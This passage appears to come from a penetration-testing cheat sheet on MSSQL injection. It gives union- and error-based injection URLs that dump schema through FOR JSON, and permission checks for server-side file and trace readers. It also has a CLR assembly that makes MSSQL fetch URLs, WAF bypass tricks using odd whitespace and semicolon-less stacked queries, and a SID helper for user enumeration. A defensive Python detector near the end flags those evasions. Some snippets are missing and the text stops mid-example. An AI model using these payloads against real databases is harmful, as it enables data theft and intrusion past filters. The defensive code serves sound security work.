```python
import struct

def get_sid(n):
    # Domain SID prefix in its binary (hex) form; the user's RID is appended as a little-endian DWORD
    domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
    user = struct.pack('<I', int(n))
    user = user.hex()
    return f"{domain}{user}"
# if n=1000, get SID of the user with ID 1000
```
### Alternative error-based injection vectors
Error-based injection usually relies on constructs such as `+AND+1=@@version--` and variants built on the «OR» operator. Queries containing these expressions are commonly blocked by Web Application Firewalls (WAFs). To get past the block, the `%2b` character can be used to concatenate a string with the result of a specific function call that triggers a data type conversion error on the required data.
```sql
-- Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
-- Or doing
Use master;
EXEC sp_helprotect 'fn_xe_file_target_read_file';
```
```sql
-- Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
-- Or doing
Use master;
EXEC sp_helprotect 'fn_get_audit_file';
```
```sql
-- Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
-- Or doing
Use master;
EXEC sp_helprotect 'fn_trace_gettable';
```
Creating a CLR UDF (Common Language Runtime User Defined Function), that is, code written in any .NET language and compiled into a DLL that is loaded into MSSQL to execute custom functions, is a process that requires dbo access. This means it is usually only feasible when the database connection runs as sa or with an administrator role.
A Visual Studio project and installation instructions are provided in this GitHub repository to load the binary into MSSQL as a CLR assembly, enabling HTTP GET requests to be executed from within MSSQL.
The core of this functionality lives in the http.cs file, which uses the WebClient class to perform a GET request and retrieve the content, as shown below:
```csharp
using System.Data.SqlTypes;
using System.Net;

public partial class UserDefinedFunctions
{
    [Microsoft.SqlServer.Server.SqlFunction]
    public static SqlString http(SqlString url)
    {
        var wc = new WebClient();
        var html = wc.DownloadString(url.Value);
        return new SqlString(html);
    }
}
```
Before executing the CREATE ASSEMBLY SQL command, it is recommended to run the following SQL snippet to add the assembly's SHA512 hash to the server's list of trusted assemblies (viewable via `select * from sys.trusted_assemblies;`):
A concise way to extract the entire contents of a table is the FOR JSON clause. This approach is more succinct than FOR XML, which requires a specific mode such as "raw". FOR JSON is preferred for its brevity.
Here is how to retrieve the schemas, tables and columns of the current database:
```sql
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
```
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:
```sql
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
```
For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
To check if you have the VIEW SERVER STATE permission, the following query can be used:
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
```
## **Little tricks for WAF bypasses**
[Tricks also from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
Non-standard whitespace characters: %C2%85 or %C2%A0:
### WAF Bypass with unorthodox stacked queries
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
```sql
SELECT 'a' SELECT 'b'
```
So for example, multiple queries such as:
```sql
use [tempdb]
create table [test] ([id] int)
insert [test] values(1)
select [id] from [test]
drop table [test]
```
Can be reduced to:
```sql
use[tempdb]create table[test]([id]int)insert[test]values(1)select[id]from[test]drop table[test]
```
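As an added, defender-side example (not code from the original page or the linked posts), the Python below normalizes a request parameter the way the MSSQL tokenizer would see it, folding the non-standard whitespace characters listed above, and then counts top-level statements so that semicolon-less stacking of the form shown here can be flagged. The keyword list and the counting heuristic are assumptions of mine, not a WAF product's logic.

```python
import re
from urllib.parse import unquote_plus

# Code points MSSQL's tokenizer accepts as whitespace but simple WAF regexes often
# miss: U+0085 (NEL, %C2%85) and U+00A0 (NBSP, %C2%A0), the two listed on this page.
ODD_WHITESPACE = {"\u0085", "\u00a0"}

# Keywords that can begin a T-SQL statement (assumed subset, enough for the examples here).
STATEMENT_KEYWORDS = {"select", "insert", "update", "delete", "create", "drop",
                      "alter", "use", "exec", "execute", "declare"}

def normalize_sql_param(raw):
    """Percent-decode a URL parameter ('+' -> space) and fold odd whitespace to a
    plain space, so a matcher sees roughly what the MSSQL tokenizer will see.
    Returns (normalized text, True if odd whitespace was present)."""
    decoded = unquote_plus(raw)
    seen_odd = any(ch in ODD_WHITESPACE for ch in decoded)
    for ch in ODD_WHITESPACE:
        decoded = decoded.replace(ch, " ")
    return re.sub(r"\s+", " ", decoded).strip(), seen_odd

def count_top_level_statements(sql):
    """Count statement-start keywords at parenthesis depth 0, after blanking string
    literals and [bracketed] identifiers. Heuristic: INSERT ... SELECT counts twice."""
    blanked = re.sub(r"'(?:''|[^'])*'", "''", sql)
    blanked = re.sub(r"\[[^\]]*\]", "[]", blanked)
    depth = count = 0
    for tok in re.findall(r"\(|\)|[A-Za-z_]+", blanked):
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth = max(0, depth - 1)
        elif depth == 0 and tok.lower() in STATEMENT_KEYWORDS:
            count += 1
    return count

def analyze_param(raw):
    """Flag the two evasions this section describes: non-standard whitespace and
    several statements stacked without a ';' separator."""
    sql, odd_ws = normalize_sql_param(raw)
    n = count_top_level_statements(sql)
    return {
        "normalized": sql,
        "odd_whitespace": odd_ws,
        "statements": n,
        "stacked_without_semicolon": n > 1 and ";" not in sql,
    }
```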
Therefore it could be possible to bypass different WAFs that don't account for this form of stacking queries. For example: